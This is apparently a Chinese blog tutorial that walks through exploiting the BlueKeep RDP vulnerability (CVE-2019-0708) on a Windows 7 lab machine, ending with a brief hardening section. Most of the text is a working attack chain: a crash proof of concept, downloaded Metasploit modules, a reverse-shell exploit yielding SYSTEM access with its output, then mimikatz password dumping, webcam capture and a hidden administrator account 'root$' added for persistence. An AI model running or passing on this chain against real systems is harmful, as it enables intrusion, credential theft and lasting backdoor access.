环境篇
Windows7 ultimate sp1 x64MSF
开启远程桌面:
关闭防火墙:
利用篇
早期蓝屏
这是早期漏洞利用POC!
git clone https://github.com/n1xbyte/CVE-2019-0708.git cd CVE-2019-0708 pip3 install impacket python3 crashpoc.py 192.168.173.136 32 #python3 crashpoc.py ip地址 系统类型 |
注:以上POC,不需要关闭防火墙即可打穿WIN7!
获取shell
下载攻击脚本:
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb |
导入攻击脚本:
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb mkdir /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb |
漏洞探测:
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set rhosts 192.168.173.136 set threads 5 run [*] 192.168.173.136:3389 - Detected RDP on 192.168.173.136:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.173.136:3389 - The target is vulnerable. [*] 192.168.173.136:3389 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
漏洞利用:
reload_all #加载攻击脚本 search cve-2019-0708 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce set rhosts 192.168.173.130 set rport 3389 set target 3 #因为我们使用的是VMware,所以可以使用target 3 exploit [*] Started reverse TCP handler on 192.168.173.1:4444 [*] 192.168.173.136:3389 - Detected RDP on 192.168.173.136:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.173.136:3389 - The target is vulnerable. [*] 192.168.173.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1. [*] 192.168.173.136:3389 - Surfing channels ... [*] 192.168.173.136:3389 - Lobbing eggs ... [*] 192.168.173.136:3389 - Forcing the USE of FREE'd object ... [*] Command shell session 3 opened (192.168.173.1:4444 -> 192.168.173.136:49161) at 2019-09-14 22:50:31 +0800 session 1 session 1 'session' ڲⲿҲǿеij ļ C:Windowssystem32>whoami whoami nt authoritysystem #成功拿到Shell,并且为System权限 #第一次explloit导致Win7蓝屏,之后正常获取Shell |
target数值的说明:
- 根据指纹自动判断
- 真实机器
- Virtual Box虚拟机
- Vmware虚拟机
权限提升
meterpreter > getuid #获取uid meterpreter > screenshot #截图 meterpreter > webcam_scream #抓拍 meterpreter > load mimikatz #获取系统密码 meterpreter > wdigest #获取系统密码 rdesktop 192.168.173.138 #登录远程桌面 net user root$ root /add net localgroup administrators root$ /add |
本次实验机器为win7,windows server 2008需要修改注册表,否则会蓝屏。
[HKEY_LOCAL_MACHINESYSTEMControlSet001ControlTerminal ServerWinStationsRDP-TcpfDisableCam]值修改为0
加固篇
影响版本
Windows Server 2008 (R2)
Windows 7 SP1
Windows Server 2003
Windows XP
临时加固
- 禁止掉3389远程端口
热补丁
参考:奇安信CVE-2019-0708漏洞热补丁工具使用手册
原创文章,作者:小嵘源码,如若转载,请注明出处:https://www.lcpttec.com/bluekeep/
微信扫一扫 
支付宝扫一扫